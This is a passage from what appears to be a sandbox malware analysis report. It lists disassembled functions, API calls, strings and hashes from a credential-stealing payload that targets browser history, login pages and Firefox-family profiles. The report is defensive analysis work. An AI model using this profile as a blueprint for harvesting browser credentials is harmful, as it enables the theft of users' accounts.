                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2791496988-0
                                                                                                                                  • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                  • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                                                                  Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                  • String ID: visited:
                                                                                                                                  • API String ID: 2470578098-1702587658
                                                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                  Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                                                  • Opcode ID: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                  • Opcode Fuzzy Hash: b421f0fbbd6ad79df9d48377ab98bfefffe95da864e54072a2f7617dfae47395
                                                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                  Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                  • memcmp.MSVCRT ref: 0040BCD6
                                                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 115830560-3916222277
                                                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                  Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                  • String ID: r!A
                                                                                                                                  • API String ID: 2791114272-628097481
                                                                                                                                  • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                  • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                                                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                  Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                  Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 770 40b58d-40b59e 771 40b5a4-40b5c0 GetModuleHandleW FindResourceW 770->771 772 40b62e-40b632 770->772 773 40b5c2-40b5ce LoadResource 771->773 774 40b5e7 771->774 773->774 775 40b5d0-40b5e5 SizeofResource LockResource 773->775 776 40b5e9-40b5eb 774->776 775->776 776->772 777 40b5ed-40b5ef 776->777 777->772 778 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 777->778 778->772
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                  • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                  • String ID: BIN
                                                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                  Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00403CBF
                                                                                                                                  • memset.MSVCRT ref: 00403CD4
                                                                                                                                  • memset.MSVCRT ref: 00403CE9
                                                                                                                                  • memset.MSVCRT ref: 00403CFE
                                                                                                                                  • memset.MSVCRT ref: 00403D13
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                  • memset.MSVCRT ref: 00403DDA
                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                  • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                  • API String ID: 4039892925-11920434
                                                                                                                                  • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                  • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                  • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                  • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                  Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00403E50
                                                                                                                                  • memset.MSVCRT ref: 00403E65
                                                                                                                                  • memset.MSVCRT ref: 00403E7A
                                                                                                                                  • memset.MSVCRT ref: 00403E8F
                                                                                                                                  • memset.MSVCRT ref: 00403EA4
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                  • memset.MSVCRT ref: 00403F6B
                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                  • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                  • API String ID: 4039892925-2068335096
                                                                                                                                  • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                  • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                  • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                  • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                  Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00403FE1
                                                                                                                                  • memset.MSVCRT ref: 00403FF6
                                                                                                                                  • memset.MSVCRT ref: 0040400B
                                                                                                                                  • memset.MSVCRT ref: 00404020
                                                                                                                                  • memset.MSVCRT ref: 00404035
                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                    • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                    • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                    • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                  • memset.MSVCRT ref: 004040FC
                                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                  • API String ID: 4039892925-3369679110
                                                                                                                                  • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                  • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                  • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                  Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memcpy
                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                                  • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                  • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                  Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorFileLastfree
                                                                                                                                  • String ID: |A
                                                                                                                                  • API String ID: 981974120-1717621600
                                                                                                                                  • Opcode ID: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                  • Opcode Fuzzy Hash: a88df5da1066620bdf33ca4472b3118252cb96d9155fbf9def9e1204f2136f90
                                                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                  Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                  • String ID: $0.@
                                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                  Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                                  • memset.MSVCRT ref: 00403C1E
